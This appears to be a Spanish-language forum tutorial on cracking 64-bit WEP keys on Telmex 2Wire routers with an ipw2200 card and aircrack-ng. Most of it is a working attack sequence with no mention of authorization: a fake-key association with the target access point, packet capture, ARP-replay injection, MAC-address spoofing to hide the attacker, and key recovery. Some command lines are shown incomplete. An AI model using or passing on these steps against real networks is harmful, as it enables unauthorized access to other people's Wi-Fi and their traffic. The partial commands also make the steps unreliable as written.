inyeccion con ipw2200 sobre 2Wire de Telmex con wep de 64 bits
Muchos me decían que tenia que parchar pero no hay necesidad bueno lo que se necesita es:
1)
el paquete de aircrack-ng-0.9.1.tar.gz
el live cd backtrack2 ( o el que quieran pero que el kernel sirva xD)
tu superhiperultracheverechido modulo (tengo una thinkpad R50e) ipw2200
bueno comenzamos muchos mousedependientes me preguntan como hacerlo aqui pongo como lo hago yo:
tengo entendido que solo se pueden usar los ataques con este metodo
2 (--interactive)
3 (--arpreplay)
4 (--chopchop)
2)primero haz un scan con
iwlist dispositivo scan
y apunta el mac del AP y el canal esto es importante
3) opcional compila e instala el aircrack siempre lo hago xD ----
descarga wget http://download.aircrack-ng.org/aircrack-ng-0.9.tar.gz
descomprime tar -zxvf aircrack-ng-0.9.tar.gz
entra en el directorio cd aircrack-ng-0.9
compila e instala make
make install
----------------------------------------------------------------
4)ahora activamos la interfaz de rtap
quitamos el modulo de ipw2200
modprobe -r ipw2200
si ponemos
modinfo ipw2200
parm: rtap_iface:create the rtap interface (1 - create, default 0) (int)
podremos ver las opciones que tiene el modulo y de ahi podemos mirar rtap_iface
cargamos el modulo con esa opcion =)
modprobe ipw2200 rtap_iface=1
con esto activamos la interfaz rtap
5)ahora tenemos que hacer una asociación a el AP dar una clave falsa o fake esto se tiene que hacer antes de aireplay
iwconfig eth1 ap macdelap
iwconfig eth1 key s:fakekey
iwconfig eth1 mode managed
6)levantamos las interfaces
ifconfig eth1 up
ifconfig rtap0 up
si en este paso ponemos iwconfig para ver la asociación , podremos verla en el dispositivo eth1...
7)ahora corremos airodump para capturar paquetes con la interfaz rtap0
airodump-ng --channel
en channel ponemos el canal del ap
el bssid del ap
-w le dice que cree un archivo llamado jijoju
rtap0 es la interfase a usar
despues nos dice que clientes hay conectados
8)ahora abrimos aireplay
--arpreplay es el ataque
-x es el numero de paquetes por segundo
-b bssid del ap
-h tumac adress (puedes cambiarla (siempre lo hago) usando ifconfig eth1 hw ether 00:11:22:33:44:55 o lo que se te ocurra)
-i que capture de este dispositivo (s)
9)esperamos un rato yo me espero a las 100000 iv's
despues con aircrack, en este caso era de 64 bits asi que pongo el parametro , si es de 128 bits pon 128 en lugar de 64 =) si quieres una taque con PTW pon -z
aircrack -n 64 archivo.cap
aircrack -z archivo.cap (ataque ptw)
tiempo estimado ... 10 minutos
mas info aqui